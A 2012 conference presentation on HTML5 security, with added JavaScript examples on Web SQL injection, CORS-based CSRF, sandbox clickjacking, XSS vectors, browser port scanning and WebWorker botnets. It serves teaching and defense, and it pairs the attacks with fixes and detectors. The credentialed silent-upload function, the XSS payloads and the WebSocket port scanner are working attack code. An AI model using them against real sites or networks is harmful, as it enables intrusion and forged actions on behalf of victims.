HTML5 introduces new security risks through features such as client-side storage, geolocation, WebSockets and cross-origin resource sharing. Attackers can use them to launch cross-site scripting, client-side SQL injection against Web SQL, application-cache poisoning, clickjacking and more. While HTML5 adds protections such as the iframe sandbox, the browser implementations current at the time of this presentation remained vulnerable. As HTML5 gains functionality, more security issues are likely to emerge that require ongoing investigation and remediation.
I took pictures from here and there by googling, not mentioning all sources; please let me know if anyone has any objection. This presentation was presented at the “securITy” Information Security Conference at BASIS SoftExpo 2012.
4. HTML5
• A new version of HTML (a markup specification, not a new protocol)
HTML5 + CSS3 + JavaScript
Compare with XML and XHTML
• Specification design
WHATWG (Apple, Mozilla, Google, Opera), founded in 2004
W3C
IETF (the WebSocket protocol)
• Still in progress at the time of this presentation (2012)
http://www.html5test.com/
6. What's in HTML5
• New tags: <canvas>, <audio>, <video>, <source>
• New tag attributes: autocomplete, autofocus, pattern (regular-expression validation)
• New form controls for date, time and email
• Geolocation (demo: http://html5demos.com/geo)
• Client-side storage: localStorage, sessionStorage and Web SQL
(demo: http://html5demos.com/database-rollback)
• WebSockets, a new way of communicating with the server
• WebWorkers, which allow multithreaded JavaScript in the background
7. What's out in HTML5
• Presentational elements: <font>, <center>
• Presentational attributes: align, border; frames: <frame>, <frameset>
• Old special effects: <marquee>, <bgsound>
Follow the rule:
Presentation and content are separated (presentation belongs in CSS)
9. Basic ideas about the new vulnerabilities
New security problems arise because new methods are brought into the web application
The underlying security issues of web applications (XSS, CSRF, injection) have not changed
New security problems have been found that are worth investigating
10. Security concern 1: client
Attack surface: client-side
• Client-side and offline storage
• Allows a far greater amount of data to be stored in the browser, so a single XSS on the origin exposes all of it
11. Security concern 2: Web SQL
• Brings SQL (an SQLite database) to the client-side
• Core methods:
– openDatabase("Database", "Database version", "Database description", "Estimated size")
– db.transaction(function (tx) { tx.executeSql("SQL statement", [arguments]); })
• The usual attacks apply: XSS and SQL injection can be used here, because a query assembled by string concatenation from attacker-controlled data is injectable on the client exactly as it is on the server
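The client-side injection the slide warns about, as an added example that is not part of the original deck. Web SQL is deprecated and absent from current browsers and from Node, so `tx` is any object that provides `executeSql(sql, args)`; in a real page it is the SQLTransaction that `db.transaction()` hands to its callback. The table and column names are assumptions for the demo.

```javascript
// Added example (not from the original slides): client-side SQL injection
// against Web SQL, and the parameterised form that prevents it.
// `tx` is whatever object provides executeSql(sql, args); in a browser it is
// the SQLTransaction passed to db.transaction(). Table/column names are made up.

// Vulnerable: the name is concatenated into the statement, so whoever controls
// it (a URL parameter the page reads, a stored XSS payload) rewrites the query.
function findUserUnsafe(tx, name) {
  const sql = "SELECT id, token FROM users WHERE name = '" + name + "'";
  tx.executeSql(sql, []);
  return sql; // returned so the effect of the input can be inspected
}

// Fixed: '?' placeholders keep the input as data; executeSql binds `args`.
function findUserSafe(tx, name) {
  const sql = 'SELECT id, token FROM users WHERE name = ?';
  tx.executeSql(sql, [name]);
  return sql;
}

// Minimal stand-in for SQLTransaction that records what would be executed.
function recordingTx() {
  const calls = [];
  return { calls, executeSql(sql, args) { calls.push({ sql, args }); } };
}

// Browser usage, guarded so the file also loads where openDatabase is absent.
if (typeof openDatabase === 'function') {
  const db = openDatabase('demo', '1.0', 'demo database', 1024 * 1024);
  db.transaction((tx) => findUserSafe(tx, "O'Brien"));
}
```

With the classic payload `' OR '1'='1` the unsafe variant turns a lookup of one user into a dump of every row, while the safe variant sends the same statement with the payload as a bound argument. The storage is only as private as the origin: any XSS on the origin can open the same database, so sensitive tokens should not be kept there at all.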
12. Security concern 3: Application cache
• Useful for offline browsing speed and to reduce server load
• The size limit for cached data per site: 5 MB
• Example 1, enabling the application cache:
<html manifest="example.manifest">
…
</html>
• Example 2, reacting to application cache updates:
applicationCache.addEventListener('checking', updateCacheStatus, false);
• Poisoning the application cache
• Any website can create a cache in the client
• Any file can be cached, even the site's root document; an attacker who can answer requests for a site (for example on a hostile network) can therefore plant a poisoned copy that the browser keeps serving from its cache after the victim has left that network
• Note: the application cache API has since been removed from current browsers in favour of Service Workers, which carry the same risk of a poisoned script persisting in the client
13. Security concern 4: HTML5 sandbox
• The sandbox attribute is used to protect a website from third-party content
<iframe src="untrusted.html" sandbox></iframe>
• It can also be turned against the framed page and used in a clickjacking attack: a sandbox without allow-top-navigation denies the framed page the right to navigate the top window, which is exactly what JavaScript frame busting relies on
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="victim"></iframe>
14. Security concern 5: CORS
• CORS (Cross-Origin Resource Sharing)
• Allows cross-domain AJAX; the browser still sends the request even when the target does not opt in, it only withholds the response from the script
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://victim", true);
xhr.setRequestHeader("Content-Type", "text/plain"); // text/plain needs no preflight
xhr.withCredentials = true; // send the victim's cookies
xhr.send("anything I want");
• Silent file upload (a cross-origin multipart POST built by hand)
function fileUpload(url, fileData, fileName) {
  var boundary = "xxxxxxxxxxxx", xhr = new XMLHttpRequest();
  xhr.open("POST", url, true);
  xhr.withCredentials = true; // the browser sets Content-Length itself; scripts may not
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  xhr.send("--" + boundary + "\r\n" +
    "Content-Disposition: form-data; name=\"file\"; filename=\"" + fileName + "\"\r\n" +
    "Content-Type: application/octet-stream\r\n\r\n" +
    fileData + "\r\n--" + boundary + "--\r\n");
}
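Why the requests above go out without a preflight, and what the silent upload puts on the wire, as an added example that is not part of the original deck. `needsPreflight` implements the CORS "simple request" rules from the Fetch standard; `buildMultipart` produces the same body a real form submission would. The target URL and field names are placeholders.

```javascript
// Added example (not from the original slides): CORS preflight rules and the
// hand-built multipart body behind a "silent file upload". URL and field names
// are placeholders.

// A request needs no preflight when the method is GET/HEAD/POST, every header
// is CORS-safelisted, and Content-Type is one of these three values. The
// browser then sends it (with cookies when withCredentials is set) and only
// refuses to hand the response to the script. That is a CSRF, not a read.
const SAFE_CONTENT_TYPES = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];
const SAFE_HEADERS = ['accept', 'accept-language', 'content-language', 'content-type'];

function needsPreflight(method, headers) {
  if (!['GET', 'HEAD', 'POST'].includes(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFE_HEADERS.includes(lower)) return true;       // e.g. X-Requested-With
    if (lower === 'content-type') {
      const mime = value.split(';')[0].trim().toLowerCase();
      if (!SAFE_CONTENT_TYPES.includes(mime)) return true; // e.g. application/json
    }
  }
  return false;
}

// Multipart/form-data body for one file part, byte-for-byte what a browser
// form post looks like, so the server cannot tell it from a user's upload.
function buildMultipart(boundary, fieldName, fileName, contents, mime = 'text/plain') {
  return (
    '--' + boundary + '\r\n' +
    'Content-Disposition: form-data; name="' + fieldName + '"; filename="' + fileName + '"\r\n' +
    'Content-Type: ' + mime + '\r\n\r\n' +
    contents + '\r\n' +
    '--' + boundary + '--\r\n'
  );
}

// Browser side: cookies ride along because of withCredentials; the body is
// returned so a caller can log exactly what was sent.
function silentUpload(url, fieldName, fileName, contents) {
  const boundary = 'x' + Math.random().toString(16).slice(2);
  const body = buildMultipart(boundary, fieldName, fileName, contents);
  const xhr = new XMLHttpRequest();
  xhr.open('POST', url, true);
  xhr.withCredentials = true;
  xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=' + boundary);
  xhr.send(body); // no preflight: see needsPreflight()
  return body;
}
```

Because none of the three safelisted content types triggers a preflight, a server cannot rely on CORS to block these writes: the defenses are the same as for any CSRF (an anti-CSRF token, an Origin header check, SameSite cookies). A server that reflects the request's Origin into Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true additionally lets the attacker read the response, which is the configuration to look for in a review.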
17. Security concern 5: clickjacking
Most Alexa top 500 websites use frame busting to protect against clickjacking:
if (top != self)
if (top.location != self.location)
This can be easily bypassed in HTML5, because a sandboxed iframe without allow-top-navigation blocks the framed page's attempt to redirect the top window:
<iframe sandbox src="//victim"></iframe>
The reliable defense is a header the browser enforces before any script in the frame runs: X-Frame-Options, or the Content-Security-Policy frame-ancestors directive (see the OWASP Clickjacking guide, reference [4]).
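A check for the weakness described in the sandbox and clickjacking slides above, as an added example that is not part of the original deck: given a site's response headers, it decides whether framing is blocked by a policy the browser enforces, or whether the page is relying on script-based frame busting that `<iframe sandbox>` defeats. Headers are passed as a lowercase-keyed object, as an HTTP client or scanner would provide; the origins used below are placeholders, and port matching in CSP sources is simplified.

```javascript
// Added example (not from the original slides): does this response carry an
// enforced anti-framing policy? Headers are a lowercase-keyed object; origins
// below are placeholders. CSP source matching ignores ports for brevity.

// Match one CSP source expression (scheme, host, or *.host) against an origin.
function sourceMatches(src, origin) {
  const u = new URL(origin);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return u.protocol === src.toLowerCase(); // "https:"
  const hasScheme = src.includes('://');
  const [scheme, hostPort] = hasScheme ? src.split('://') : [null, src];
  if (scheme && scheme.toLowerCase() + ':' !== u.protocol) return false;
  const host = hostPort.split(':')[0].toLowerCase();
  if (host.startsWith('*.')) return u.hostname.endsWith(host.slice(1));
  return u.hostname === host;
}

// Returns true when a page at `pageOrigin` may be embedded by `framerOrigin`.
function framingAllowed(headers, pageOrigin, framerOrigin) {
  const csp = headers['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      // frame-ancestors takes precedence over X-Frame-Options when both exist
      const sources = directive.split(/\s+/).slice(1).map((s) => s.toLowerCase());
      if (sources.includes("'none'")) return false;
      if (sources.includes('*')) return true;
      if (sources.includes("'self'") && framerOrigin === pageOrigin) return true;
      return sources.filter((s) => !s.startsWith("'")).some((s) => sourceMatches(s, framerOrigin));
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  // No enforced policy: the page depends on frame busting (or nothing) and is
  // clickjackable through <iframe sandbox src="...">.
  return true;
}

// One-word verdict for a scan report, tested against an attacker origin.
function clickjackingVerdict(headers, pageOrigin) {
  return framingAllowed(headers, pageOrigin, 'https://attacker.invalid') ? 'framable' : 'protected';
}
```

Run it over the headers of every page that renders a sensitive action; anything reported as framable while the page contains `top.location` checks is exactly the case the slide describes.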
18. Security concern 5: XSS
New tags and new attributes cause XSS (vectors from the HTML5 Security Cheatsheet, references [1] and [5]):
<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>
Before HTML5 (the payload needs user interaction):
<input type="text" value="-->Injecting here" onmouseover="alert('Injected value')">
With HTML5 (autofocus fires the handler without any interaction):
<input type="text" value="-->Injecting here" onfocus="alert('Injected value')" autofocus>
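Detection logic for the vectors above, as an added example that is not part of the original deck: the kind of rule a WAF or a log scanner would apply to request parameters, written so that a filter tuned for pre-HTML5 payloads (onmouseover, onclick) also catches the new interaction-free attributes. It is detection only; the page itself still needs context-aware output encoding or a real sanitiser. The sample inputs are the slide's own payloads plus a constructed benign fragment.

```javascript
// Added example (not from the original slides): flag HTML5 event-handler
// vectors in untrusted input. Detection only, not sanitisation.

const VECTOR_RULES = [
  // any inline event handler attribute (onfocus, onerror, ontoggle, ...),
  // matched as an attribute rather than inside a tag so "-->" breakouts still hit
  { name: 'inline-event-handler', re: /(^|[\s"'\/])on[a-z]+\s*=/i },
  // HTML5 attributes that fire a handler with no user interaction
  { name: 'autofocus', re: /(^|[\s"'\/])autofocus(?=[\s>\/]|$)/i },
  { name: 'formaction', re: /(^|[\s"'\/])formaction\s*=/i },
  // media elements, the onerror carriers shown on the slide
  { name: 'media-element', re: /<(video|audio|source)[\s>\/]/i },
];

// Undo the few entity encodings attackers use to hide '<' and quotes from
// naive filters. Single pass; double-encoded input is left for the caller.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
}

// Returns the names of every rule the input triggers (empty array = clean).
function detectHtml5Vectors(input) {
  const decoded = decodeEntities(input);
  return VECTOR_RULES.filter((r) => r.re.test(decoded)).map((r) => r.name);
}
```

Expect some false positives on prose containing `one=` or a media tag in a comment field; that is acceptable for an alert, not for blocking. The rule set is a denylist and must not be mistaken for the fix: encode on output, or allowlist tags and attributes with a parser-based sanitiser.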
19. Security concern 5: Drag and Drop API
An attacker's page can make the user drag attacker-chosen data into a field of a framed victim page, a drag-and-drop variant of clickjacking (reference [3]):
<div draggable="true"
ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')">
<h3>DRAG ME!!</h3>
</div>
20. Security concern 6: HTML5 shell (Shell of the Future, reference [2])
The victim's browser is turned into a proxy for the pentester's requests (flow from the slide's diagram):
1. The pentester's browser sends the request (GET http://www.google.com) to the proxy
2. The proxy sends the request to the web server that hosts the shell
3. The web server sends the request to the victim's browser
4. The victim's browser requests http://www.google.com from the Google web server
5. The Google web server responds with the HTML of its home page to the victim's browser
6. The victim's browser sends the response body to the shell on the web server
7. The web server sends the response body to the proxy
8. The proxy sends the Google home page to the pentester's browser
21. Security concern 7: network reconnaissance
Cross-domain XMLHttpRequests and WebSockets can be used as a timing-based port scanner from the victim's browser: the time until the connection attempt fails or succeeds reveals the port state
Port status | WebSocket | COR (XHR)
Open (application type 1 & 2) | <100 ms | <100 ms
Closed | ~1000 ms | ~1000 ms
Filtered | >30000 ms | >30000 ms
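The timing scan behind the table, as an added example that is not part of the original deck. The thresholds are the slide's figures; `wsProbe` is what runs in a browser, and the probe is injectable so the classifier can be exercised without a network. The host and port values used are placeholders.

```javascript
// Added example (not from the original slides): infer port state from how long
// a WebSocket connection attempt takes. Thresholds are the slide's numbers.
// Host/port values are placeholders; `probe` is injectable for offline use.

// Measure how long a WebSocket to host:port takes to open or fail. Browsers
// give the script no error detail, so elapsed time is the only signal.
function wsProbe(host, port, timeoutMs = 35000) {
  return new Promise((resolve) => {
    const start = Date.now();
    let done = false;
    const finish = () => { if (!done) { done = true; resolve(Date.now() - start); } };
    let ws;
    try { ws = new WebSocket('ws://' + host + ':' + port + '/'); }
    catch (e) { finish(); return; }        // ports on the browser's blocklist throw immediately
    ws.onopen = () => { ws.close(); finish(); };
    ws.onerror = finish;
    ws.onclose = finish;
    setTimeout(finish, timeoutMs);
  });
}

// The slide's mapping from elapsed time to port state. Open ports fail fast
// because the non-WebSocket service answers (or closes) at once; closed ports
// get a TCP reset after about a second; filtered ports time out.
function classify(elapsedMs) {
  if (elapsedMs < 100) return 'open';
  if (elapsedMs < 30000) return 'closed';
  return 'filtered';
}

// Scan sequentially so the timings are not skewed by parallel connection limits.
async function scanPorts(host, ports, probe = wsProbe) {
  const results = {};
  for (const port of ports) {
    results[port] = classify(await probe(host, port));
  }
  return results;
}
```

A page that executes this scans the victim's internal network (`scanPorts('192.0.2.10', [22, 80, 443, 8080])`) from inside the perimeter. The practical countermeasure is on the network side, not the browser: do not rely on the "internal" address of a service as its only access control.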
22. Security concern 8: HTML5 botnets
WebWorkers are a threading model for JavaScript: background JavaScript threads started from a page
Botnet creation:
• WebWorkers can send cross-domain XMLHttpRequests even though the remote website does not support CORS (the requests are sent; only the responses are withheld)
• Reaching out to victims
• Extending the execution lifetime (the worker keeps running as long as the tab stays open)
A test showed that even a small botnet of just 600 zombies can send around … requests
HTML5 botnet based attacks:
• Application-level DDoS attacks
• Email spam
• Distributed password cracking
23. Distributed password cracking
It is easy to launch a password cracker under HTML5, for example Ravan (http://www.andlabs.org/tools/ravan.html, reference [9])
Tests show that one browser can compute around 100,000 MD5 hashes per second in JavaScript. That is 100 to 115 times slower than native cracking code (such as LC5), but with 100 zombies under your control the combined rate matches it.
Ravan architecture (figure on the slide):
• Ravan Master (web): the hash is submitted here; the master manages the cracking backend
• Work farm: each zombie browser gets work, runs it in a WebWorker and submits the result
24. Top 10 risks in HTML5
1. Clickjacking and phishing by mixing layers and iframes
2. CSRF and leveraging CORS to bypass the SOP
3. Attacking Web SQL and client-side SQL injection
4. Stealing information from storage and global variables
5. HTML5 tag abuse and XSS
6. HTML5 and DOM-based XSS and redirects
7. DOM injections and hijacking with HTML5
8. Abusing thick-client features
9. Using WebSockets for stealth attacks
10. Abusing WebWorker functionality
25. Conclusion
• HTML5, DOM Level 3 and XHR Level 2, driven by JavaScript, are the building blocks of the next generation of web applications
• As people rely heavily on the web browser, more features will be brought into HTML5
• More and richer features in HTML5 will bring new threats and challenges
• More security issues will be discovered in the future
26. References
[1] HTML5 Security CheatSheet - http://code.google.com/p/html5security/
[2] Shell of the Future - http://www.andlabs.org/tools.html#sotf
[3] Next Generation Clickjacking - http://www.contextis.co.uk/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf
[4] OWASP ClickJacking Guide - http://www.owasp.org/index.php/Clickjacking
[5] http://html5sec.org/
[6] Hacking Facebook with HTML5 - http://m-austin.com/blog/?p=19
[7] http://html5demos.com
[8] https://www.owasp.org/index.php/Clickjacking
[9] http://www.andlabs.org/